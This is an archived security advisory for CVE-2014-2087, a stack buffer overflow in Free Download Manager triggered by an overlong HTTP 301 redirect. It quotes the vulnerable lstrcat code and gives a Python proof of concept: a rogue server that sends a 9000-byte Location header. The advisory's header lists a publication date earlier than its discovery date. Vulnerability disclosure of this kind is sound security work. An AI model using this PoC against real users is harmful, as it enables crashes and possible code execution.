Skip to content
cyberexploits
doswindowstext

Free Download Manager - Stack Based Buffer Overflow

Free Download Manager - Stack Based Buffer Overflow

Published on 2014-03-17

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/dos/32332.txt7eac4c3a
raw
RCE Security Advisory

http://www.rcesecurity.com

 

 

1. ADVISORY INFORMATION

-----------------------

Product:        Free Download Manager

Vendor URL:     www.freedownloadmanager.org

Type:           Stack-based Buffer Overflow [CWE-121]

Date found:     2014-02-20

Date published: 2014-02-13

CVSSv2 Score:   9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

CVE:            CVE-2014-2087

 

 

2. CREDITS

----------

This vulnerability was discovered and researched by Julien Ahrens from

RCE Security.

 

 

3. VERSIONS AFFECTED

--------------------

Free Download Manager v3.9.3 build 1360 (latest)

Free Download Manager v3.8 build 1173

Free Download Manager v3.0 build 852

and other older versions may be affected too.

 

 

4. VULNERABILITY DESCRIPTION

----------------------------

A stack-based buffer overflow vulnerability has been identified in the

Free Download Manager.

 

The application parses download requests, which are added to the

download queue, but does not properly validate the length of the

complete download queue object when it’s removed from the queue by the

user. The following function from fdm.exe (source file:

Downloads_Deleted.cpp) is triggered on deletion:

 

void CDownloads_Deleted::UpdateDownload(int iItem)

 

This function reads the filename of the download object using

CDownloads_Tasks::GetFileName into szFile and adds the whole URL value

as a description (in brackets) via an insecure strcat() sequence to

szFile during the queue deletion process.



Since the application follows HTTP 301 redirects, an attacker who

controls the target HTTP server is able to send arbitrary long filename

values to exploit this flaw. If the complete name of the queued download

exceeds the size of szFile (10000 bytes), strcat() writes outside the

expected memory boundaries. 

 

This leads to a stack-based buffer overflow with an overwritten SEH

chain or return points, resulting in remote code execution. Successful

exploits can allow remote attackers to execute arbitrary code with the

privileges of the user running the application. Failed exploits will

result in a denial-of-service condition.

 

This vulnerability is also exploitable locally via "File->Import->Import

list of downloads"

 

 

5. VULNERABLE CODE PART

-----------------------

// Downloads_Deleted.cpp

 

void CDownloads_Deleted::UpdateDownload(int iItem)

{

    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);

 

    CHAR szFile [10000];     

    CDownloads_Tasks::GetFileName (dld, szFile);

    lstrcat (szFile, " (");

    lstrcat (szFile, dld->pMgr->get_URL ());

    lstrcat (szFile, ")");

    SetItemText (iItem, 0, szFile);

[..]

}





6. PROOF-OF-CONCEPT (PYTHON)

----------------------------

#!/usr/bin/python

from socket import *

from time import sleep

 

host = "192.168.0.1"

port = 80

 

s = socket(AF_INET, SOCK_STREAM)

s.bind((host, port))

s.listen(1)

print "\n[+] Listening on %d ..." % port

 

cl, addr = s.accept()

print "[+] Connection accepted from %s" % addr[0]

 

junk0 = "\x43" * 9000

 

payload = junk0

 

buffer = "HTTP/1.1 301 Moved Permanently\r\n"

buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"

buffer += "Server: Apache/2.2.22 (Debian)\r\n"

buffer += "Location: "+ payload + "\r\n"

buffer += "Vary: Accept-Encoding\r\n"

buffer += "Content-Length: 8000\r\n"

buffer += "Keep-Alive: timeout=5, max=100\r\n"

buffer += "Connection: Keep-Alive\r\n"

buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"

buffer += "\r\n"

buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"

buffer += "<html><head>\n"

buffer += "<title>301 Moved Permanently</title>\n"

buffer += "</head><body>\n"

buffer += "<h1>Moved Permanently</h1>\n"

buffer += "<p>The document has moved <a

href=\""+payload+"\">here</a>.</p>\n"

buffer += "</body></html>\n"

 

print cl.recv(1000)

cl.send(buffer)

print "[+] Sending buffer: OK\n"

 

sleep(1)

cl.close()

s.close()

 

 

7. SOLUTION

-----------

None

 

 

8. REPORT TIMELINE

------------------

2014-02-20: Discovery of the vulnerability

2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)

2014-02-24: MITRE assigns CVE-2014-2087

2014-02-25: Vendor Notification #2

2014-02-26: Vendor Notification #3

2014-03-05: Vendor Response

2014-03-05: Vulnerability details sent to vendor

2014-03-09: RCE Security asks for a status update

2014-03-13: No response from vendor

2014-03-13: Full Disclosure according to disclosure policy

 

 

9. REFERENCES

-------------

http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution
View on GitHub